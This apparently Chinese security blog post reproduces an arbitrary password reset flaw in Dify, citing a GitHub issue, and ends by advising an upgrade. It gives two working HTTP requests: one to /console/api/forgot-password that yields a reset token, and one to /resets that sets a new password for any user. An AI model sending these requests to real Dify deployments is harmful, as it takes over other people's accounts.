【漏洞复现】dify任意密码重置

发布于2025年5月28日2025年7月19日作者:cve-20

【漏洞复现】dify任意密码重置

yzcrnx 安全鸭 2025-05-28 10:49

原文：https://github.com/langgenius/dify/issues/18114

瞎逛GitHub的时候发现dify新出一个漏洞，任意密码重置实现任意用户接管。通过调用api完成任意用户密码重置，简单复现如下：

获取token

POST /console/api/forgot-password HTTP/1.1
Host: dify.xxx.com
Content-Type: application/json

{"email":"[email protected]","language":"zh-Hans"}

重置密码

上面接口拿到token，直接入参到resets进行密码重置操作

POST /console/api/forgot-password/resets HTTP/1.1
Host: dify.xxx.com

{"token": "029f0e0f-3b46-4aab-9ef5-eba0dc66e58c","new_password":"AAa1234567","password_confirm":"AAa1234567"}

完成重置

修复方案：目前新版本已经修复，部署新版本即可。

【漏洞复现】dify任意密码重置

【漏洞复现】dify任意密码重置

近期文章

近期评论

归档

分类